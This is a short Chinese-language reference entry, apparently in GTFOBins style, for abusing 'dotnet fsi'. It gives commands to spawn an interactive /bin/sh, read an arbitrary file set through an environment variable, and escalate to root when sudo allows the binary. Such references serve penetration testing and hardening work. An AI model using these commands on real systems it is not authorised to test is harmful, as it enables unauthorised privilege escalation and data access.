用来生成一个交互式的系统shell。
dotnet fsi
System.Diagnostics.Process.Start("/bin/sh").WaitForExit();;
从文件中读取数据。
export LFILE=要读取的文件路径
dotnet fsi
System.IO.File.ReadAllText(System.Environment.GetEnvironmentVariable("LFILE"));;
如果二进制文件被 sudo 允许以超级用户身份运行,可能被用于访问文件系统、提升或维持特权访问。
sudo dotnet fsi
System.Diagnostics.Process.Start("/bin/sh").WaitForExit();;